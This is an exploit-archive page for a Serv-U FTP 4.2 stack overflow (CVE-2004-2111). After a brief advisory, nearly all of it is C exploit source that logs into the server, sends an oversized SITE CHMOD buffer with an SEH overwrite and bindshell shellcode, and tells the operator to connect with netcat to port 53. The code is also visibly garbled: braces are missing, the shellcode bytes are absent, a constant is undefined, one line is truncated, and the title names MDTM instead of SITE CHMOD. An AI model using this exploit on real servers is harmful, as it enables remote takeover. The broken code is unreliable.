RhinoSoft Serv-U FTPd Server 3/4 - MDTM Command Stack Overflow (2)

Related Vulnerabilities: CVE-2004-2111  
Publish Date: 25 Jan 2004
                source: http://www.securityfocus.com/bid/9483/info
RhinoSoft Serv-U FTP Server is reportedly prone to a buffer overflow. The issue exists when a 'site chmod' command is issued on a non-existant file. If an excessively long filename is specified for the command, an internal buffer will be overrun, resulting in a failure of the FTP server. Execution of arbitrary code may be possible. 

* serv-u 4.2 site chmod long_file_name stack overflow exp
* vul discovered by kkqq@0x557.org
* exp coded by mslug@safechina.net
* Jan 25 2004

/* test with serv-U, on win2k sp4 en machine*/

#include <winsock2.h>
#include <stdio.h>

#define CHMOD_CMD "SITE CHMOD 0666 "
#define ERR_HEADER "550 /"
#define BUF_STACK_POSITION 0x1ec

// bindshell shellcode from www.cnhonker.org
#define    PORT             53
#define    PORT_OFFSET      176

//0x0A code removed from shellcode
unsigned char bdshellcode[] =
// decode
// shellcode

//unsigned long jmp_esp = 0x77f4144b;
//unsigned long jmp_ebx = 0x77a5211b;
//unsigned long call_ebx = 0x750219d6; //use this one

unsigned char evil_chmod[5000];
unsigned char seh[] = "\xeb\x06\x90\x90" //jmp below
                     "\xd6\x19\x02\x75" //call_ebx = 0x750219d6
                     "\x33\xc0"         //below: xor eax, eax
                     "\xb0\x1c"         //mov al, 1c
                     "\x03\xd8"         //add ebx, eax
                     "\xc6\x03\x90";    //mov byte ptr [ebx], 90

int main(int argc, char **argv)
  WSADATA wsa;
  unsigned short port;
  int ftpsock, ret;
  char recv_buf[1000];
  unsigned long     ip;
  unsigned char buf[100];

  printf("* Serv-U 4.2 site chmod stack overflow exp*\n");
  printf("* Vul discovered by kkqq@0x557.org        *\n");
  printf("* Coded by mslug@safechina.net            *\n");

  if(argc<6) {
     printf("serv.exe <host> <port> <user> <password> <path>\n");
     return 0;

  WSAStartup(MAKEWORD(2,2), &wsa);

  port = htons(PORT)^(USHORT)0x9999;
  memcpy(&bdshellcode[PORT_OFFSET], &port, 2);

  ftpsock = connect_tcp(argv[1], atoi(argv[2]));
  if(ftpsock < 0) {
     printf("[-] Connection refused\n");
     return 0;
  ret = recv(ftpsock, recv_buf, sizeof(recv_buf), 0);

  recv_buf[ret] = 0;
  printf("%s", recv_buf);

  sprintf(buf, "USER %s\r\n", argv[3]);
  send(ftpsock, buf, strlen(buf), 0);

  ret = recv(ftpsock, recv_buf, sizeof(recv_buf), 0);

  recv_buf[ret] = 0;
  printf("%s", recv_buf);

  sprintf(buf, "PASS %s\r\n", argv[4]);
  send(ftpsock, buf, strlen(buf), 0);

  ret = recv(ftpsock, recv_buf, sizeof(recv_buf), 0);
  recv_buf[ret] = 0;
  printf("%s", recv_buf);

  sprintf(buf, "CWD %s\r\n", argv[5]);
  send(ftpsock, buf, strlen(buf), 0);

  ret = recv(ftpsock, recv_buf, sizeof(recv_buf), 0);
  recv_buf[ret] = 0;
  printf("%s", recv_buf);

  memset(evil_chmod, 0x90, sizeof(evil_chmod));
  memcpy(evil_chmod, CHMOD_CMD, strlen(CHMOD_CMD));
  memcpy(&evil_chmod[strlen(CHMOD_CMD)+PADDING_SIZE], seh, strlen(seh));
bdshellcode, strlen(bdshellcode));

  send(ftpsock, evil_chmod, strlen(evil_chmod), 0);

  printf("[+] Shellcode sent\n");
  printf("[+] Now nc to port 53\n");


  return 0;

int connect_tcp(char *host, int port)
  struct hostent *rhost;
  struct sockaddr_in sin_rhost;
  unsigned long ip_rhost;
  int sock;

  memset(&sin_rhost, 0, sizeof(sin_rhost));

  sin_rhost.sin_family = AF_INET;
  sin_rhost.sin_port = htons(port);
  ip_rhost = inet_addr(host);
  if(ip_rhost==INADDR_NONE) {
     rhost = gethostbyname(host);
     if(rhost==0) return -1;
     ip_rhost = *(unsigned long*)rhost->h_addr;

  sin_rhost.sin_addr.s_addr = ip_rhost;

  if(sock<0) {
     return -1;

  if(connect(sock, (struct sockaddr*) &sin_rhost, sizeof(sin_rhost))) {
     return -1;

  return sock;